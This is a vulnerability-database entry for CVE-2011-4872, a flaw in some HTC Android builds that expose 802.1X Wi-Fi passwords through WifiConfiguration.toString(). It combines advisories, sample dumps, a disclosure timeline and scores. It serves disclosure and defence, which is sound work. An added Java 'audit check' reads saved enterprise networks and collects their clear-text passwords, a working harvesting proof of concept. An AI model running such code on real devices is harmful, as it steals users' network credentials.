ID

VAR-201202-0161


CVE

CVE-2011-4872


TITLE

Multiple HTC Devices 'Android.permission.ACCESS_WIFI_STATE' Information Disclosure Vulnerability

Trust: 0.9

sources: CNVD: CNVD-2012-0389 // BID: 51790

DESCRIPTION

Multiple HTC Android devices, including the Desire HD (FRG83D and GRI40), Glacier (FRG83), Droid Incredible (FRF91), Thunderbolt 4G (FRG83D), Sensation Z710e (GRI40), Sensation 4G (GRI40), Desire S (GRI40), EVO 3D (GRI40), and EVO 4G (GRI40), allow attackers to obtain 802.1X Wi-Fi credentials and the SSID via a crafted application that uses the android.permission.ACCESS_WIFI_STATE permission to call the toString method on the WifiConfiguration class. On these HTC builds of Android, a user's 802.1X Wi-Fi credentials and SSID are exposed to any application holding basic Wi-Fi permissions: the password field of the toString output contains the actual password in clear text, where stock Android leaves it blank or prints only a "*" placeholder. The underlying problem is that the HTC-made devices mishandle stored Wi-Fi authentication information, so the Wi-Fi credentials configured on the device can be obtained by a third party. The attack needs no network access to the phone itself: an attacker entices the victim into installing a malicious application that requests android.permission.ACCESS_WIFI_STATE, and if the application also holds android.permission.INTERNET it can collect the credentials and send them to a server on the Internet. Neither permission is unusual for an ordinary application to request. The disclosed information may aid in further attacks: because the leaked secret is an enterprise 802.1X credential and the SSID often identifies the organisation that issued it, the exposure allows targeted exploitation of that organisation's network.
--------------------------------------------------------------------------------
Affected Vendors:
--------------------------------------------------------------------------------
HTC
--------------------------------------------------------------------------------
Affected Versions:
--------------------------------------------------------------------------------
We have verified the following devices as having this issue (there may be others, including some non-HTC phones):
Desire HD (both "ace" and "spade" board revisions) - Versions FRG83D, GRI40
Glacier - Version FRG83
Droid Incredible - Version FRF91
Thunderbolt 4G - Version FRG83D
Sensation Z710e - Version GRI40
Sensation 4G - Version GRI40
Desire S - Version GRI40
EVO 3D - Version GRI40
EVO 4G - Version GRI40
--------------------------------------------------------------------------------
Non-Affected Versions:
--------------------------------------------------------------------------------
myTouch3g (appears to run either an unmodified, or only lightly modified, Android build)
Nexus One (runs an unmodified Android build)
--------------------------------------------------------------------------------
Severity
--------------------------------------------------------------------------------
Critical
--------------------------------------------------------------------------------
See also
--------------------------------------------------------------------------------
CVE ID: CVE-2011-4872
--------------------------------------------------------------------------------
Timeline:
--------------------------------------------------------------------------------
- 2012-02-01: Public disclosure
- 2012-01-31: Submit final public disclosure doc to HTC Global for feedback
- 2012-01-31: HTC publishes information via their web site
- 2012-01-20: Public disclosure - postponed
- 2012-01-19: Discussion with HTC Global on their time schedule
- 2012-01-05: Conference call with HTC Global
- 2012-01-02: Public disclosure - postponed
- 2011-12-05: Discussed public disclosure time frames with HTC and Google
- 2011-10-11: Updated all individuals and groups that are aware of the issue
- 2011-10-11: Follow-up conference call with HTC Global and Google
- 2011-09-19: Updated all individuals and groups that were aware of the issue
- 2011-09-19: Conference call with HTC Global and Google
- 2011-09-08: HTC and Google verified exploit
- 2011-09-07: Notified key government agencies and CERT under non-public disclosure
- 2011-09-07: Initial email and phone call with HTC Global and Google
--------------------------------------------------------------------------------
Vulnerability Details:
--------------------------------------------------------------------------------
There is an issue in certain HTC builds of Android that can expose the user's 802.1X password to any program with the "android.permission.ACCESS_WIFI_STATE" permission. In addition, if the SSID is an identifiable SSID ("Sample University" or "Enterprise XYZ"), this issue exposes enterprise-privileged credentials in a manner that allows targeted exploitation.

The output of WifiConfiguration.toString() for a saved 802.1X network (one field per line) will look something like this:

* ID: 2 SSID: "ct" BSSID: null PRIO: 16
 KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN
 AuthAlgorithms:
 PairwiseCiphers: CCMP
 GroupCiphers: WEP40 WEP104 TKIP CCMP
 PSK:
 eap: PEAP
 phase2: auth=MSCHAPV2
 identity: [Your User Name]
 anonymous_identity:
 password:
 client_cert:
 private_key:
 ca_cert: keystore://CACERT_ct

On most Android devices, the password field is either left blank, as above, or simply populated with a "*" to indicate that a password is present. However, on affected HTC devices, the password field contains the actual user password in clear text. This is sample output from a Sprint EVO running Android 2.3.3 (the network was configured with the password "test"):

* ID: 0 SSID: "wpa2eap" BSSID: null PRIO: 21
 KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN
 AuthAlgorithms:
 PairwiseCiphers: CCMP
 GroupCiphers: WEP40 WEP104 TKIP CCMP
 PSK:
 eap: TTLS
 phase2: auth=PAP
 identity: test
 anonymous_identity:
 password: test
 client_cert:
 private_key:
 ca_cert: keystore://CACERT_wpa2eap
--------------------------------------------------------------------------------
Vendor Response
--------------------------------------------------------------------------------
Google and HTC have been very responsive and good to work with on this issue. Google has made changes to the Android code to help better protect the credential store, and HTC has released updates for all currently supported phones and side-loads for all non-supported phones. Customers with affected versions can find information from HTC about updating their phone at: http://www.htc.com/www/help/

Google has also done a code scan of every application currently in the Android Market, and there are no applications currently exploiting this vulnerability.
--------------------------------------------------------------------------------
Credit
--------------------------------------------------------------------------------
Chris Hessing from The Open1X Group (http://www.open1x.org), who is currently working on Android, iOS, Windows, Mac OS X, and Linux 802.1X tools for Cloudpath Networks (http://www.cloudpath.net/), discovered this password exploit.
--------------------------------------------------------------------------------
Contact Information
--------------------------------------------------------------------------------
Chris Hessing
     Senior Engineer, Cloudpath Networks (chris.hessing@cloudpath.net)
     Chief Architect, Open1X Group (chris@open1x.org)
Bret Jordan CISSP
     Senior Security Architect, Open1X Group (jordan@open1x.org)
--------------------------------------------------------------------------------
About
--------------------------------------------------------------------------------
Cloudpath Networks
Cloudpath Networks provides software solutions that allow diverse environments to operate WPA2-Enterprise and 802.1X networks in a scalable, sustainable manner. From Bring Your Own Device (BYOD) in enterprise to student-owned devices in education, Cloudpath's XpressConnect Wizard has been proven to provide unmatched simplicity on millions of devices around the globe. XpressConnect is an automated, self-service wizard for connecting users to WPA2-Enterprise and 802.1X across a wide range of device types and authentication methods, including credential-based (PEAP and TTLS) and certificate-based (TLS). For certificate-based environments, XpressConnect's integration technology seamlessly connects to existing Microsoft CA servers to extend automated certificate issuance to non-domain devices, including iOS (iPhone, iPad, iPod Touch), Android, Windows, Mac OS X, and Linux.

The Open1X Group
The Open1X Group is a strategic research and development group established in 2001 to support the creation and adoption of secure authentication systems over traditionally insecure network connections. The Open1X Group performs active and ongoing research and analysis into the IEEE 802.1X protocol, the IETF EAP methods, emerging authentication technologies, and various cryptographic implementations. The Open1X Group has had the support of major universities, enterprise companies, major hi-tech companies, and non-profit organizations. The Open1X Group also performs on-going analysis of business and academic interests in secure authentication and single sign-on systems, and of government and non-government regulations and mandates for compliance in secure authentication. The Open1X Group leverages a distributed team of security architects, engineers, and research scientists with specializations in 802.1X, grid and high performance computing, wireless networking, federated authentication, black box testing, cryptography, large enterprise and university deployment experience, and global project development. The Open1X Group is a pioneer in the secure authentication space, with the first major widespread 802.1X federated deployment back in 1999/2000 and the development of a fully featured 802.1X supplicant, XSupplicant.

Bret Jordan CISSP
Sr Security Architect
PGP Fingerprint: 62A6 5999 0F7D 0D61 4C66 D59C 2DB5 111D 63BC A303
"Without cryptography vihv vivc ce xhrnrw, however, the only thing that can not be unscrambled is an egg."

----------------------------------------------------------------------
TITLE:
HTC Products Wi-Fi Credentials Disclosure Weakness

SECUNIA ADVISORY ID:
SA47837

VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/47837/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=47837

RELEASE DATE:
2012-02-02

DESCRIPTION:
Open1X Group has reported a weakness in multiple HTC products, which can be exploited by malicious people to disclose potentially sensitive information.

The weakness is caused by the "WifiConfiguration::toString()" method returning the Wi-Fi credentials of stored networks in clear text.

Successful exploitation requires that a malicious application is installed with the "android.permission.ACCESS_WIFI_STATE" permission.

PROVIDED AND/OR DISCOVERED BY:
Chris Hessing, Open1X Group.

ORIGINAL ADVISORY:
HTC:
http://www.htc.com/www/help/

Open1X Group:
http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html

US-CERT VU#763355:
http://www.kb.cert.org/vuls/id/763355
----------------------------------------------------------------------

Trust: 3.42

sources: NVD: CVE-2011-4872 // CERT/CC: VU#763355 // JVNDB: JVNDB-2012-001308 // CNVD: CNVD-2012-0389 // BID: 51790 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362
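
The on-device check implied by the Vulnerability Details section above, written out as an added example. This is editor-supplied code for this page, not the advisory's proof of concept and not HTC or Google code. An app holding only android.permission.ACCESS_WIFI_STATE enumerates the saved networks through WifiManager.getConfiguredNetworks(), keeps the WPA_EAP / IEEE8021X entries, and classifies each WifiConfiguration.toString() dump as masked (blank or "*" password field, the stock behaviour) or leaking (anything else). The class name WifiCredentialLeakCheck, the Finding type and the two regular expressions are assumptions of this example; the Android API calls are the public Gingerbread-era ones. The dump parser expects the real multi-line toString() output, not the single-line form the advisory text was flattened into here. On current Android releases the same code reports nothing: getConfiguredNetworks() no longer returns other apps' networks to an ordinary app, and the enterprise password is no longer printed by toString().

```java
// Added audit check for CVE-2011-4872 (example code, not from the advisory, HTC or Google).
// Uses only public Android 2.x APIs: WifiManager.getConfiguredNetworks(), which needs
// android.permission.ACCESS_WIFI_STATE, and WifiConfiguration.toString().
// Class name, Finding type and regexes are this example's own choices.
import android.content.Context;
import android.net.wifi.WifiConfiguration;
import android.net.wifi.WifiManager;

import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public final class WifiCredentialLeakCheck {

    /** One finding: a saved 802.1X network whose dump carries a usable password. */
    public static final class Finding {
        public final String ssid;
        public final String passwordField;   // the leaked value; report its presence, not the value

        Finding(String ssid, String passwordField) {
            this.ssid = ssid;
            this.passwordField = passwordField;
        }
    }

    // "password: <value>" line of the multi-line WifiConfiguration.toString() output.
    private static final Pattern PASSWORD_LINE =
            Pattern.compile("(?m)^\\s*password:\\s*(.*?)\\s*$");
    // SSID field of the header line, e.g. SSID: "wpa2eap"
    private static final Pattern SSID_FIELD =
            Pattern.compile("SSID:\\s*(\"[^\"]*\"|\\S+)");

    /**
     * Returns the clear-text password if the dump exposes one, otherwise null.
     * A blank field, or the "*" placeholder that stock Android prints when a
     * password is set, is the masked (non-vulnerable) behaviour.
     */
    public static String exposedPassword(String toStringDump) {
        Matcher m = PASSWORD_LINE.matcher(toStringDump);
        if (!m.find()) {
            return null;                   // no enterprise fields in this dump
        }
        String value = m.group(1);
        if (value.isEmpty() || "*".equals(value)) {
            return null;                   // masked: stock / fixed behaviour
        }
        return value;                      // HTC builds in the advisory land here
    }

    /** Extracts the SSID from a saved dump, for reporting on captures taken off-device. */
    public static String ssidOf(String toStringDump) {
        Matcher m = SSID_FIELD.matcher(toStringDump);
        return m.find() ? m.group(1) : "<unknown>";
    }

    /**
     * Device-side check: enumerate every saved network visible to this app and
     * report those whose toString() output carries a clear-text 802.1X password.
     * Only WPA_EAP / IEEE8021X networks are inspected; the PSK of personal
     * networks is printed as "*" on every build the advisory mentions.
     */
    public static List<Finding> scan(Context ctx) {
        List<Finding> findings = new ArrayList<Finding>();
        WifiManager wm = (WifiManager) ctx.getSystemService(Context.WIFI_SERVICE);
        List<WifiConfiguration> nets = wm.getConfiguredNetworks();
        if (nets == null) {
            return findings;               // Wi-Fi off, or no Wi-Fi on this device
        }
        for (WifiConfiguration cfg : nets) {
            boolean enterprise =
                    cfg.allowedKeyManagement.get(WifiConfiguration.KeyMgmt.WPA_EAP)
                    || cfg.allowedKeyManagement.get(WifiConfiguration.KeyMgmt.IEEE8021X);
            if (!enterprise) {
                continue;
            }
            String leaked = exposedPassword(cfg.toString());
            if (leaked != null) {
                findings.add(new Finding(cfg.SSID, leaked));
            }
        }
        return findings;
    }
}
```

Call scan() from any Context, for example an Activity's onCreate(), in an APK whose manifest requests only ACCESS_WIFI_STATE. A non-empty result on a device from the affected list reproduces the advisory's finding; the same APK returning an empty list after the HTC update is the regression check. exposedPassword() and ssidOf() can also be run over a dump saved from a device, which is the form in which the evidence usually reaches an incident responder.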

IOT TAXONOMY

category: ['Network device'] | sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2012-0389

AFFECTED PRODUCTS

vendor: htc | model: desire hd | scope: eq | version: gri40

Trust: 2.4

vendor: htc | model: sensation z710e | scope: eq | version: gri40

Trust: 1.6

vendor: htc | model: droid incredible | scope: eq | version: frf91

Trust: 1.6

vendor: htc | model: sensation 4g | scope: eq | version: gri40

Trust: 1.6

vendor: htc | model: thunderbolt 4g | scope: eq | version: frg83d

Trust: 1.6

vendor: htc | model: glacier | scope: eq | version: frg83

Trust: 1.6

vendor: htc | model: desire hd | scope: eq | version: frg83d

Trust: 1.6

vendor: htc | model: evo 4g | scope: eq | version: gri40

Trust: 1.6

vendor: htc | model: evo 3d | scope: eq | version: gri40

Trust: 1.6

vendor: htc | model: desire s | scope: eq | version: gri40

Trust: 1.6

vendor: htc | model: desire hd | scope: eq | version: 0

Trust: 0.9

vendor: htc | model: thunderbolt 4g frg83d | scope: - | version: -

Trust: 0.9

vendor: htc | model: sensation z710e gri40 | scope: - | version: -

Trust: 0.9

vendor: htc | model: sensation 4g gri40 | scope: - | version: -

Trust: 0.9

vendor: htc | model: glacier frg83 | scope: - | version: -

Trust: 0.9

vendor: htc | model: evo 4g gri40 | scope: - | version: -

Trust: 0.9

vendor: htc | model: evo 3d gri40 | scope: - | version: -

Trust: 0.9

vendor: htc | model: droid incredible frf91 | scope: - | version: -

Trust: 0.9

vendor: htc | model: desire s gri40 | scope: - | version: -

Trust: 0.9

vendor: htc | model: - | scope: - | version: -

Trust: 0.8

vendor: htc | model: desire hd | scope: eq | version: (ace and spade) - versions frg83d

Trust: 0.8

vendor: htc | model: desire s | scope: eq | version: - version gri40

Trust: 0.8

vendor: htc | model: droid incredible | scope: eq | version: - version frf91

Trust: 0.8

vendor: htc | model: evo 3d | scope: eq | version: - version gri40

Trust: 0.8

vendor: htc | model: evo 4g | scope: eq | version: - version gri40

Trust: 0.8

vendor: htc | model: glacier | scope: eq | version: - version frg83

Trust: 0.8

vendor: htc | model: sensation 4g | scope: eq | version: - version gri40

Trust: 0.8

vendor: htc | model: sensation z710e | scope: eq | version: - version gri40

Trust: 0.8

vendor: htc | model: thunderbolt 4g | scope: eq | version: - version frg83d

Trust: 0.8

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

CVSS

SEVERITY

nvd@nist.gov: CVE-2011-4872
value: LOW

Trust: 1.0

CARNEGIE MELLON: VU#763355
value: 1.23

Trust: 0.8

NVD: CVE-2011-4872
value: LOW

Trust: 0.8

CNNVD: CNNVD-201202-043
value: LOW

Trust: 0.6

CVSSV2

nvd@nist.gov: CVE-2011-4872
severity: LOW
baseScore: 2.6
vectorString: AV:N/AC:H/AU:N/C:P/I:N/A:N
accessVector: NETWORK
accessComplexity: HIGH
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: NONE
availabilityImpact: NONE
exploitabilityScore: 4.9
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

CVSSV3

-

Trust: 1.8

sources: CERT/CC: VU#763355 // JVNDB: JVNDB-2012-001308 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

PROBLEMTYPE DATA

problemtype:CWE-200

Trust: 1.8

sources: JVNDB: JVNDB-2012-001308 // NVD: CVE-2011-4872

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 109344 // CNNVD: CNNVD-201202-043

TYPE

information disclosure

Trust: 0.6

sources: CNNVD: CNNVD-201202-043

CONFIGURATIONS

sources: JVNDB: JVNDB-2012-001308

PATCH

title: HTC Help Center - WiFi security fix | url: http://www.htc.com/www/help/#w1307647922146

Trust: 0.8

title: Patch for multiple HTC devices 'Android.permission.ACCESS_WIFI_STATE' information disclosure vulnerability | url: https://www.cnvd.org.cn/patchInfo/show/8691

Trust: 0.6

sources: CNVD: CNVD-2012-0389 // JVNDB: JVNDB-2012-001308

EXTERNAL IDS

db: CERT/CC | id: VU#763355

Trust: 3.6

db: NVD | id: CVE-2011-4872

Trust: 3.4

db: BID | id: 51790

Trust: 1.9

db: SECUNIA | id: 47837

Trust: 1.8

db: JVNDB | id: JVNDB-2012-001308

Trust: 0.8

db: SECUNIA | id: 47860

Trust: 0.7

db: CNVD | id: CNVD-2012-0389

Trust: 0.6

db: BUGTRAQ | id: 20120201 802.1X PASSWORD EXPLOIT ON MANY HTC ANDROID DEVICES

Trust: 0.6

db: NSFOCUS | id: 18651

Trust: 0.6

db: CNNVD | id: CNNVD-201202-043

Trust: 0.6

db: PACKETSTORM | id: 109344

Trust: 0.1

db: PACKETSTORM | id: 109394

Trust: 0.1

db: PACKETSTORM | id: 109362

Trust: 0.1

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

REFERENCES

url:http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html

Trust: 2.8

url:http://www.kb.cert.org/vuls/id/763355

Trust: 2.8

url:http://www.securityfocus.com/bid/51790

Trust: 1.6

url:http://secunia.com/advisories/47837

Trust: 1.6

url:http://archives.neohapsis.com/archives/bugtraq/2012-02/0002.html

Trust: 1.6

url:http://www.htc.com/www/help/

Trust: 1.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4872

Trust: 0.8

url:http://jvn.jp/cert/jvnvu763355

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4872

Trust: 0.8

url:http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html

Trust: 0.6

url:http://secunia.com/advisories/47860

Trust: 0.6

url:http://www.nsfocus.net/vulndb/18651

Trust: 0.6

url:http://www.htc.com/www/

Trust: 0.3

url:http://secunia.com/vulnerability_intelligence/

Trust: 0.2

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.2

url:http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

Trust: 0.2

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.2

url:http://secunia.com/vulnerability_scanning/personal/

Trust: 0.2

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.2

url:http://secunia.com/blog/296

Trust: 0.2

url:http://www.cloudpath.net/

Trust: 0.1

url:http://www.open1x.org

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2011-4872

Trust: 0.1

url:http://archives.neohapsis.com/archives/bugtraq/2012-02/att-0005/esa-2012-009.txt

Trust: 0.1

url:http://secunia.com/advisories/47860/#comments

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=47860

Trust: 0.1

url:http://secunia.com/advisories/47860/

Trust: 0.1

url:http://secunia.com/advisories/47837/

Trust: 0.1

url:https://ca.secunia.com/?page=viewadvisory&vuln_id=47837

Trust: 0.1

url:http://secunia.com/advisories/47837/#comments

Trust: 0.1

sources: CERT/CC: VU#763355 // CNVD: CNVD-2012-0389 // BID: 51790 // JVNDB: JVNDB-2012-001308 // PACKETSTORM: 109344 // PACKETSTORM: 109394 // PACKETSTORM: 109362 // CNNVD: CNNVD-201202-043 // NVD: CVE-2011-4872

CREDITS

Chris Hessing and Bret Jordan

Trust: 0.9

sources: BID: 51790 // CNNVD: CNNVD-201202-043

SOURCES

db: CERT/CC | id: VU#763355
db: CNVD | id: CNVD-2012-0389
db: BID | id: 51790
db: JVNDB | id: JVNDB-2012-001308
db: PACKETSTORM | id: 109344
db: PACKETSTORM | id: 109394
db: PACKETSTORM | id: 109362
db: CNNVD | id: CNNVD-201202-043
db: NVD | id: CVE-2011-4872

LAST UPDATE DATE

2024-08-14T14:14:37.863000+00:00


SOURCES UPDATE DATE

db: CERT/CC | id: VU#763355 | date: 2012-02-01T00:00:00
db: CNVD | id: CNVD-2012-0389 | date: 2012-02-03T00:00:00
db: BID | id: 51790 | date: 2012-02-01T00:00:00
db: JVNDB | id: JVNDB-2012-001308 | date: 2012-02-07T00:00:00
db: CNNVD | id: CNNVD-201202-043 | date: 2012-02-06T00:00:00
db: NVD | id: CVE-2011-4872 | date: 2012-02-16T05:00:00

SOURCES RELEASE DATE

db: CERT/CC | id: VU#763355 | date: 2012-02-01T00:00:00
db: CNVD | id: CNVD-2012-0389 | date: 2012-02-03T00:00:00
db: BID | id: 51790 | date: 2012-02-01T00:00:00
db: JVNDB | id: JVNDB-2012-001308 | date: 2012-02-07T00:00:00
db: PACKETSTORM | id: 109344 | date: 2012-02-02T02:00:50
db: PACKETSTORM | id: 109394 | date: 2012-02-02T06:44:24
db: PACKETSTORM | id: 109362 | date: 2012-02-02T03:31:21
db: CNNVD | id: CNNVD-201202-043 | date: 1900-01-01T00:00:00
db: NVD | id: CVE-2011-4872 | date: 2012-02-05T11:55:03.047